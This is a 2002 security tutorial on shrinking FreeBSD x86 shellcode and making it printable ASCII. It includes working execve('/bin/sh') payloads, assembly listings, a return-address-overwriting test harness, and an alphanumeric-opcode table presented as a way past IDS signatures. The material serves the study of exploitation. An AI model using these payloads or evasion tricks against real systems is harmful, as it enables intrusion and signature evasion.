Writing "Elegant" SHELLCODE

Author: watercloud < watercloud@nsfocus.com >
Homepage: http://www.nsfocus.com
Date: 2002-1-4

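    The vitality of shellcode lies in what it does. If it can do its job and also be
reasonably "elegant", its charm shows all the more.
In my view, the elegance of shellcode shows in two places:
<1> The shellcode itself (its machine code) should be as short as possible.
<2> The shellcode as written in source should also be as short as possible, using machine code that can be written as ASCII characters wherever possible.

For example, the following two pieces of shellcode both run on FreeBSD, and both spawn a new shell: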
char shellcode_1[38]=
      "\xeb\x17\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x8d\x5e"
      "\x08\x50\x53\x56\x56\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh";

char shellcode_2[24]=
     "1\xc0Ph//shh/binT[PPSS4;\xcd\x80";

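Clearly shellcode_2 is more compact than shellcode_1. In size, shellcode_1 is 37 bytes
of machine code and shellcode_2 is 23 bytes; as written in source, shellcode_1 takes
127 characters and shellcode_2 takes 32.
So there are two ways to polish shellcode: first, make the code itself smaller; second,
use machine code / assembly instructions that can be written as ASCII characters
wherever possible.
Using ASCII is not only about making the shellcode look good. More importantly, more
and more firewalls and IDSes use shellcode that circulates on the net as detection
signatures, so the closer a shellcode is to an ordinary string, the more likely it is
to get past their detection.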
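
The two sizes compared above can be checked mechanically. The following is a minimal sketch and not part of the original article: written_length is a hypothetical helper which assumes that a byte in 0x21..0x7E (other than '"' and '\') costs one source character, that the control characters \a \b \f \v \r \n and the two quoted characters cost two, and that every other byte costs a four-character \xNN escape. It ignores the case where a literal must be split after a hex escape.

```c
#include <stddef.h>

/* Number of source characters needed to write one byte inside a C
 * string literal, under the assumptions stated in the lead-in. */
static size_t byte_cost(unsigned char b)
{
    switch (b) {
    case '\a': case '\b': case '\f':
    case '\v': case '\r': case '\n':
        return 2;                 /* named escape such as \a */
    case '"': case '\\':
        return 2;                 /* must be written as \" or \\ */
    default:
        break;
    }
    if (b >= 0x21 && b <= 0x7e)
        return 1;                 /* written as the character itself */
    return 4;                     /* written as \xNN */
}

/* Written size, in source characters, of n bytes of machine code. */
size_t written_length(const unsigned char *code, size_t n)
{
    size_t total = 0;
    for (size_t i = 0; i < n; i++)
        total += byte_cost(code[i]);
    return total;
}
```

For the 23 bytes of shellcode_2 this gives 32, matching the figure above. The 127 quoted for shellcode_1 counts its fully \x-escaped form; a compact rewrite of the same bytes would come out shorter.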

Below we walk through simplifying a concrete FreeBSD shellcode to show how this polishing is done.

First, let's write a simple shellcode program.

Write the following program, test.c:

/* test.c for test shellcode */
#include <stdio.h>
#include <unistd.h>   /* execve */

int main(void)
{
    char *arg[2];
    arg[0] = "/bin/sh";
    arg[1] = NULL;
    execve(arg[0], arg, NULL);
    return 1;   /* only reached if execve fails */
}
Compile: gcc test.c -static -o test
Use gdb to see how the system call receives its arguments: gdb test
(gdb) disass execve
Dump of assembler code for function execve:
0x8048254 <execve>:     lea    0x3b,%eax
0x804825a <execve+6>:   int    $0x80

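As we can see, the arguments are passed on the stack, which makes writing the shellcode even simpler.
To summarize: before int $0x80, al must hold 0x3b and the stack must hold, from high address to low:

High address:
^   [pointer to the environment variables ]
|   [pointer to the command-line arguments]
|   [pointer to the command to execute    ]
|   [return address of execve             ]
Low address (top of stack)

and that is all there is to it!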
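
The order of the stack slots is easy to get backwards, so here is a toy model of it. This is a sketch for illustration only: the toy_* names are hypothetical, the "addresses" are just array indices, and the layout assumed is the one used by the assembly later in this article (envp pushed first, then argv, then the path, then a dummy return-address slot).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum { STACK_WORDS = 8 };

/* A toy model of a downward-growing 32-bit stack. */
struct toy_stack {
    uint32_t mem[STACK_WORDS];
    size_t   sp;                /* index of the current top of stack */
};

void toy_init(struct toy_stack *s) { s->sp = STACK_WORDS; }

/* push: move the stack pointer down one word, then store. */
void toy_push(struct toy_stack *s, uint32_t v)
{
    assert(s->sp > 0);
    s->mem[--s->sp] = v;
}

/* Word at byte offset off from the stack pointer, like off(%esp). */
uint32_t toy_at(const struct toy_stack *s, size_t off)
{
    assert(s->sp + off / 4 < STACK_WORDS);
    return s->mem[s->sp + off / 4];
}

/* Lay out the frame expected at int $0x80 for execve(path, argv, envp). */
void toy_execve_frame(struct toy_stack *s, uint32_t path, uint32_t argv,
                      uint32_t envp, uint32_t dummy_ret)
{
    toy_push(s, envp);       /* pushed first, ends up at the highest address */
    toy_push(s, argv);
    toy_push(s, path);
    toy_push(s, dummy_ret);  /* slot a normal call would fill with its return address */
}
```

After toy_execve_frame, toy_at(&s, 0) is the dummy return address and toy_at(&s, 4), toy_at(&s, 8), toy_at(&s, 12) are the path, argv and envp pointers in that order.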
Write a small program, t.c:
main(){}

gcc -S t.c
This gives us a skeleton assembly program, t.s:
cat t.s

        .file   "t.c"
        .version        "01.01"
gcc2_compiled.:
.text
        .p2align 2,0x90
.globl main
                .type            main,@function
main:
        pushl %ebp
        movl %esp,%ebp
.L2:
        leave
        ret
.Lfe1:
                .size            main,.Lfe1-main
        .ident "GCC: (GNU) c 2.95.3 [FreeBSD] 20010315 (release)"

Now we have an assembly skeleton. Simplifying it, we write the assembly program test.s
as follows:
.text
        .p2align 2,0x90
.globl main
        .type   main,@function
main:
        jmp next
real:
        popl %esi            # esi points to "/bin/sh"
        xorl %eax,%eax       # eax = 0

        movb %al,0x7(%esi)   # append a '\0' after "/bin/sh"
        movl %esi,0x8(%esi)  # build char *arg[2] right after "/bin/sh\0": arg[0] = esi, pointing to "/bin/sh"
        movl %eax,0xc(%esi)  # arg[1] = 0
        leal 0x8(%esi),%ebx  # ebx plays the role of arg
        pushl %eax           # push 0: the NULL in execve(arg[0], arg, NULL)
        pushl %ebx           # push arg
        pushl %esi           # push arg[0], i.e. the start address of "/bin/sh"
        pushl %esi           # return-address slot for execve; any value will do
        movb $0x3b,%al
        int   $0x80
next:
        call real
        .string "/bin/sh"
.Lend:
        .size   main,.Lend-main

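Compile: gcc test.s -o test
Run it:
bash-2.05$ ./test
Bus error (core dumped)   Strange!
Think about it: the code segment is read-only by default, and "/bin/sh" sits in the
code segment. We build char *arg[2] right after it, so writing into that area is bound
to fail.

The fix: change the .text at the top of test.s to .data, which tells gcc that this
region is readable and writable and should be treated as a data segment.
Recompile after the change and run again:
bash-2.05$ ./test
$

It works!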

Let's look at its machine code with objdump -D test
Among the output we can see:
. . . .
080494c0 <main>:
80494c0:       eb 17                   jmp    80494d9 <next>
080494c2 <real>:
80494c2:       5e                      pop    %esi
80494c3:       31 c0                   xor    %eax,%eax
80494c5:       88 46 07                mov    %al,0x7(%esi)
80494c8:       89 76 08                mov    %esi,0x8(%esi)
80494cb:       89 46 0c                mov    %eax,0xc(%esi)
80494ce:       8d 5e 08                lea    0x8(%esi),%ebx
80494d1:       50                      push   %eax
80494d2:       53                      push   %ebx
80494d3:       56                      push   %esi
80494d4:       56                      push   %esi
80494d5:       b0 3b                   mov    $0x3b,%al
80494d7:       cd 80                   int    $0x80

080494d9 <next>:
80494d9:       e8 e4 ff ff ff          call   80494c2 <real>
. . . . .

Extracting these bytes gives our shellcode:
"\xeb\x17\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x8d\x5e"
"\x08\x50\x53\x56\x56\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh";
37 bytes in total.
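
The operand bytes of the jmp and call in the listing (eb 17 and e8 e4 ff ff ff) are displacements relative to the address of the following instruction, which is why they have to be recomputed whenever the code between them changes length. A minimal sketch of that arithmetic follows; the function names are hypothetical, and the short-jump helper assumes the caller has already checked that the target is within -128..127 bytes.

```c
#include <stdint.h>

/* Displacement byte of a 2-byte short jump (eb xx, 7x xx) located at
 * address insn that should land on target. The CPU adds the
 * displacement to the address of the NEXT instruction (insn + 2). */
uint8_t short_jump_disp(uint32_t insn, uint32_t target)
{
    return (uint8_t)(target - (insn + 2));
}

/* 32-bit displacement of a 5-byte near call (e8 xx xx xx xx) located at
 * address insn, as a raw two's-complement bit pattern. */
uint32_t near_call_disp(uint32_t insn, uint32_t target)
{
    return target - (insn + 5);
}

/* Store a 32-bit value in little-endian order, the order in which the
 * displacement bytes appear in the instruction stream. */
void store_le32(uint32_t v, unsigned char out[4])
{
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}
```

With the addresses from the listing, short_jump_disp(0x80494c0, 0x80494d9) yields 0x17, and near_call_disp(0x80494d9, 0x80494c2) yields 0xffffffe4, which store_le32 lays out as e4 ff ff ff.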

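To test it, write a test program testshell.c as follows:
#include<stdio.h>
char sh[]=
"\xeb\x17\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x8d\x5e"
"\x08\x50\x53\x56\x56\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh";
main()
{
long p[1];
p[2]=sh;   /* deliberately writes past p: with this compiler and frame layout p[2] is main's saved return address, so returning from main jumps into sh */
}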

Compile and run:
bash-2.05$ gcc testshell.c -o testshell
testshell.c: In function `main':
testshell.c:7: warning: assignment makes integer from pointer without a cast
bash-2.05$ ./testshell
$

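It works, but the code is rather long, and most of it goes into building and filling in
char *arg[2].
So let's see whether execve("/bin/sh",0,0); works on FreeBSD. (Note: it does not work
on Linux, where argv[0] of the command-line arguments must be set.)

Write a test program test.c:
int main(){execve("/bin/sh",0,0);}
Compile and run: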
bash-2.05$ gcc test.c
test.c: In function `main':
test.c:2: warning: return type of `main' is not `int'
bash-2.05$ ./a.out
$
So writing shellcode on FreeBSD is even simpler: with no command-line arguments to build, much of the code goes away.
Write another test.s, compile it, and objdump -D test shows:
080494c0 <main>:
80494c0:       eb 0e                   jmp    80494d0 <next>

080494c2 <real>:
80494c2:       5e                      pop    %esi
80494c3:       31 c0                   xor    %eax,%eax
80494c5:       88 46 07                mov    %al,0x7(%esi)
80494c8:       50                      push   %eax
80494c9:       50                      push   %eax
80494ca:       56                      push   %esi
80494cb:       56                      push   %esi
80494cc:       b0 3b                   mov    $0x3b,%al
80494ce:       cd 80                   int    $0x80

080494d0 <next>:
80494d0:       e8 ed ff ff ff          call   80494c2 <real>

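This time the shellcode becomes:
"\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\x56\xb0\x3b\xcd\x80\xe8\xed\xff\xff\xff/bin/sh"
28 bytes in total.
Next, let's write it differently, using a plain character wherever a byte can be written as one:
"\xeb\x0e^1\xc0\x88F\aPPVV\xb0;\xcd\x80\xe8\xed\xff\xff\xff/bin/sh"
Much more compact!
However, "\x88F" does not mean what we want in a C string literal: a \x escape absorbs
every hexadecimal digit that follows it, and 'F' is a hexadecimal digit, so the compiler
reads \x88F as a single escape whose value does not fit in a char. Compiling
main(){printf("\x88F");}
gives
warning: escape sequence out of range for character

So it has to be written as:
"\xeb\x0e^1\xc0\x88""F\aPPVV\xb0;\xcd\x80\xe8\xed\xff\xff\xff/bin/sh"
that is, split into two adjacent string literals right after the \x88.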

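The bytes that can be written as characters are the ASCII range 0x21 - 0x7E (of which
'"' and '\' must themselves be escaped inside a C string literal) plus a few special characters:
0x7 -- '\a'
0x8 -- '\b'
0xc -- '\f'
0xb -- '\v'
0xd -- '\r'
0xa -- '\n'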
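Looking through an assembly manual tells us which instructions have machine code that can be written as characters.
But someone has already summarized this in Phrack 57, so we can spare ourselves the effort and quote it here: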

hexadecimal opcode | char | instruction
-------------------+------+--------------------------------
30 </r>            | '0' | xor <r/m8>,<r8>
31 </r>            | '1' | xor <r/m32>,<r32>
32 </r>            | '2' | xor <r8>,<r/m8>
33 </r>            | '3' | xor <r32>,<r/m32>
34 <imm8>          | '4' | xor al,<imm8>
35 <imm32>         | '5' | xor eax,<imm32>
36                 | '6' | ss:   (Segment Override Prefix)
37                 | '7' | aaa
38 </r>            | '8' | cmp <r/m8>,<r8>
39 </r>            | '9' | cmp <r/m32>,<r32>
41                 | 'A' | inc ecx
42                 | 'B' | inc edx
43                 | 'C' | inc ebx
44                 | 'D' | inc esp
45                 | 'E' | inc ebp
46                 | 'F' | inc esi
47                 | 'G' | inc edi
48                 | 'H' | dec eax
49                 | 'I' | dec ecx
4A                 | 'J' | dec edx
4B                 | 'K' | dec ebx
4C                 | 'L' | dec esp
4D                 | 'M' | dec ebp
4E                 | 'N' | dec esi
4F                 | 'O' | dec edi
50                 | 'P' | push eax
51                 | 'Q' | push ecx
52                 | 'R' | push edx
53                 | 'S' | push ebx
54                 | 'T' | push esp
55                 | 'U' | push ebp
56                 | 'V' | push esi
57                 | 'W' | push edi
58                 | 'X' | pop eax
59                 | 'Y' | pop ecx
5A                 | 'Z' | pop edx
61                 | 'a' | popa
62 <...>           | 'b' | bound <...>
63 <...>           | 'c' | arpl <...>
64                 | 'd' | fs:   (Segment Override Prefix)
65                 | 'e' | gs:   (Segment Override Prefix)
66                 | 'f' | o16:    (Operand Size Override)
67                 | 'g' | a16:    (Address Size Override)
68 <imm32>         | 'h' | push <imm32>
69 <...>           | 'i' | imul <...>
6A <imm8>          | 'j' | push <imm8>
6B <...>           | 'k' | imul <...>
6C <...>           | 'l' | insb <...>
6D <...>           | 'm' | insd <...>
6E <...>           | 'n' | outsb <...>
6F <...>           | 'o' | outsd <...>
70 <disp8>         | 'p' | jo <disp8>
71 <disp8>         | 'q' | jno <disp8>
72 <disp8>         | 'r' | jb <disp8>
73 <disp8>         | 's' | jae <disp8>
74 <disp8>         | 't' | je <disp8>
75 <disp8>         | 'u' | jne <disp8>
76 <disp8>         | 'v' | jbe <disp8>
77 <disp8>         | 'w' | ja <disp8>
78 <disp8>         | 'x' | js <disp8>
79 <disp8>         | 'y' | jns <disp8>
7A <disp8>         | 'z' | jp <disp8>

See? That gives us some ideas.
Let's look at our earlier code:
080494c0 <main>:
80494c0:       eb 0e                   jmp    80494d0 <next> ; it would be nice to use je/jne/jb... here
080494c2 <real>:
80494c2:       5e                      pop    %esi
80494c3:       31 c0                   xor    %eax,%eax ; moved to the start of main, this lets je replace jmp
80494c5:       88 46 07                mov    %al,0x7(%esi)
80494c8:       50                      push   %eax
80494c9:       50                      push   %eax
80494ca:       56                      push   %esi
80494cb:       56                      push   %esi
80494cc:       b0 3b                   mov    $0x3b,%al ; can be replaced by xorb $0x3b,%al
80494ce:       cd 80                   int    $0x80
. . . . .

After the changes:

080494c0 <main>:
80494c0:       31 c0                   xor    %eax,%eax
80494c2:       74 0c                   je     80494d0 <next>

080494c4 <real>:
80494c4:       5f                      pop    %edi
80494c5:       50                      push   %eax
80494c6:       50                      push   %eax
80494c7:       57                      push   %edi
80494c8:       57                      push   %edi
80494c9:       88 47 07                mov    %al,0x7(%edi)
80494cc:       34 3b                   xor    $0x3b,%al
80494ce:       cd 80                   int    $0x80

080494d0 <next>:
80494d0:       e8 ef ff ff ff          call   80494c4 <real>

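The corresponding code is:
"1\xc0t\f_PPWW\x88G\a4;\xcd\x80\xe8\xef\xff\xff\xff/bin/sh"
28 bytes in total, 57 characters as written.
See, the written form got simpler again.
The je is always taken because xor %eax,%eax sets the zero flag, and xor $0x3b,%al
loads 0x3b because al is 0 at that point. Using %edi instead of %esi also turns the
byte after \x88 from 'F' into 'G', which is not a hexadecimal digit, so the string no
longer needs to be split.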

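Now most of the waste is in call real and in writing the '\0' after the last byte of
"/bin/sh". Can we break away from the

jmp next
real:
   . . .
next:
   call real
   .string "/bin/sh"

scheme altogether?
The key point is that on FreeBSD our shellcode needs only one string, a very small
amount of data, so we can simply keep that string on the stack.
We push "/bin/sh" onto the stack beforehand.
The string still has to end with '\0', so we first push a 0 onto the stack.
And since "/bin/sh" is only 7 characters, we can use "/bin//sh" instead, which fills
two whole 4-byte pushes and has the same effect.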

Following this idea, we end up with:

0804847c <main>:
804847c:       31 c0                   xor    %eax,%eax
804847e:       50                      push   %eax        ; pushl 0
804847f:       68 2f 2f 73 68          push   $0x68732f2f ; pushl "//sh"
8048484:       68 2f 62 69 6e          push   $0x6e69622f ; pushl "/bin"
8048489:       54                      push   %esp
804848a:       5b                      pop    %ebx        ; ebx = address of "/bin//sh"
804848b:       50                      push   %eax
804848c:       50                      push   %eax
804848d:       53                      push   %ebx
804848e:       53                      push   %ebx
804848f:       34 3b                   xor    $0x3b,%al
8048491:       cd 80                   int    $0x80
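
The two push immediates in this listing look reversed because x86 stores values in little-endian order, and the second half of the string is pushed first because the stack grows downward. A minimal sketch of the conversion, with a hypothetical helper name:

```c
#include <stdint.h>

/* Immediate operand for a push imm32 that places the four bytes of s on
 * the stack in memory order. x86 is little-endian, so s[0] becomes the
 * least significant byte of the operand. */
uint32_t push_imm_for(const char s[4])
{
    return  (uint32_t)(unsigned char)s[0]
         | ((uint32_t)(unsigned char)s[1] << 8)
         | ((uint32_t)(unsigned char)s[2] << 16)
         | ((uint32_t)(unsigned char)s[3] << 24);
}
```

push_imm_for("/bin") gives 0x6e69622f and push_imm_for("//sh") gives 0x68732f2f, the two constants used in the listing.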

The corresponding shellcode is:
"1\xc0Ph//shh/binT[PPSS4;\xcd\x80"

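Of course, xor %eax,%eax could also be written as:
pushl $0x32323232   ; pushl "2222"
popl %eax
xorl $0x32323232,%eax
Then \xcd\x80 would be the only bytes in the whole shellcode that are not characters,
but the 2-byte instruction turns into 11 bytes ("h2222X52222"), which hardly seems worth it.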

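Finally, are you tempted to replace \xcd\x80 as well?

Don't be too optimistic: replacing it is harder, because it requires working with the
exact position of esp. We won't go into it here; if you are interested, see Phrack 57.

These are just my own humble opinions; corrections are welcome.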

References:
Microsoft MASM32 v6 help manual
Phrack 57: Writing ia32 alphanumeric shellcodes